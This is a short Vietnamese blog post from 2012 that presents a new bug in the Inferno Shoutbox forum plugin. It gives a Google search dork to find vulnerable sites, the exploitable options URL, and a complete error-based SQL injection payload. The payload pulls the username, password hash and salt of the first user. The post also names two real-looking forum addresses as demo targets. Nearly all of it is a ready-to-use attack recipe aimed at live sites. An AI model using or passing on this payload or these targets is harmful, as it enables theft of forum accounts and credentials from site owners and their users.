Chủ Nhật, 2 tháng 9, 2012

[New bug] sqli INURL:infernoshout.php

1.Sử dụng dork trên google

INURL:infernoshout.php


2. Exploit link: infernoshout.php?do=options&area=commands


3. Ném vào phần input dòng bên dưới còn output điền gì cũng đc.  

COMMAND INPUT :

Code:
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
4. nếu hiện DATABASE ERROR thì xem mã nguồn của nó kéo xuống bên dưới hiện ra kết quả

Đã thử vài site không chơi đc kiểu này 

demo: http://sinhvienphuyen.vn/forum/infernoshout.php
www.saigoncdclub.com/forum/infernoshout.php

Không có nhận xét nào: